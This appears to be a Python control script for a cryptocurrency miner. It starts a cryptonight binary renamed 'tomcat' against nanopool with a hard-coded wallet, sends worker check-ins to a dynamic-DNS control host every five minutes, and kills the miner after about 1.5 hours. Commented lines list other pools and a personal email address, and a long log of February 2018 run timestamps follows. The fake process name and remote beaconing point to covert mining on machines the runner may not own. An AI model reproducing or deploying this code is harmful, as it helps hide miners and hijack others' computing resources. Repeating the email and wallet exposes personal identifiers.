import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:01.288853
#2018-02-17 17:08:06.774179
#2018-02-17 18:56:04.074796
#2018-02-17 20:44:06.799049
#2018-02-17 22:31:06.991687
#2018-02-18 00:14:06.461264
#2018-02-18 02:06:05.558706
#2018-02-18 03:55:06.071151
#2018-02-18 05:42:06.237485
#2018-02-18 07:34:06.732922
#2018-02-18 09:22:06.918050
#2018-02-18 11:09:03.642594
#2018-02-18 12:56:01.717703
#2018-02-18 14:43:01.671950
#2018-02-18 16:33:06.488568
#2018-02-18 18:22:05.960230
#2018-02-18 20:08:03.854350
#2018-02-18 21:54:06.153525
#2018-02-18 23:42:07.276923
#2018-02-19 01:28:06.878292
#2018-02-19 03:16:06.971979
#2018-02-19 05:01:06.870456
#2018-02-19 06:45:06.900790
#2018-02-19 08:36:01.453972
#2018-02-19 10:24:08.700215
#2018-02-19 12:12:04.594530
#2018-02-19 13:59:07.931370
#2018-02-19 15:48:09.963840
#2018-02-19 17:35:09.251947
#2018-02-19 19:24:07.629775
#2018-02-19 21:12:07.963812
#2018-02-19 22:58:03.483269
#2018-02-20 00:41:06.940348
#2018-02-20 02:31:01.791192
#2018-02-20 04:20:06.670444
#2018-02-20 06:04:07.569716
#2018-02-20 07:49:01.493189
#2018-02-20 09:34:01.791380
#2018-02-20 11:18:02.167792
#2018-02-20 13:04:08.926209
#2018-02-20 14:48:07.812950
#2018-02-20 16:34:11.581781
#2018-02-20 18:22:10.036724
#2018-02-20 20:12:07.912756
#2018-02-20 21:58:04.500346
#2018-02-20 23:38:08.160733
#2018-02-21 01:22:02.256252
#2018-02-21 03:09:07.691890
#2018-02-21 04:56:05.795486
#2018-02-21 06:44:03.859990
#2018-02-21 08:31:04.714576
#2018-02-21 10:16:08.677651
#2018-02-21 12:04:04.779532
#2018-02-21 13:52:01.244917
#2018-02-21 15:38:09.136957
#2018-02-21 17:31:06.449535
#2018-02-21 19:17:18.760243
#2018-02-21 21:05:08.044718
#2018-02-21 22:52:05.145853
#2018-02-22 00:39:01.903361
#2018-02-22 02:26:07.218613
#2018-02-22 04:13:04.373486
#2018-02-22 05:58:03.851542
#2018-02-22 07:45:05.060000
#2018-02-22 09:34:05.263815
#2018-02-22 11:18:06.153368
#2018-02-22 13:04:04.448568
#2018-02-22 14:51:02.048069
#2018-02-22 16:37:09.880648
#2018-02-22 18:24:07.892535
#2018-02-22 20:16:06.201426
#2018-02-22 22:02:07.767135
#2018-02-22 23:48:08.058950
#2018-02-23 01:37:06.438001
#2018-02-23 03:25:06.938909
#2018-02-23 05:11:03.506531
#2018-02-23 06:55:08.904980
#2018-02-23 08:46:05.832334
#2018-02-23 11:02:07.698281
#2018-02-23 12:57:07.525690
#2018-02-23 14:43:08.048684
#2018-02-23 16:33:03.895755
#2018-02-23 18:21:01.603044
#2018-02-23 20:05:06.129981
#2018-02-23 21:52:01.488557
#2018-02-23 23:39:02.074630
#2018-02-24 01:27:05.551438
#2018-02-24 03:18:05.552780
#2018-02-24 05:03:07.048568
#2018-02-24 06:51:03.978466
#2018-02-24 08:38:01.363835
#2018-02-24 10:22:07.062373
#2018-02-24 12:17:06.488199
#2018-02-24 14:09:07.360364
#2018-02-24 15:56:05.923840
#2018-02-24 17:48:07.523929
#2018-02-24 19:36:01.265143
#2018-02-24 21:23:02.140335
#2018-02-25 01:22:01.979863
#2018-02-25 05:30:07.412790
#2018-02-25 11:35:07.247614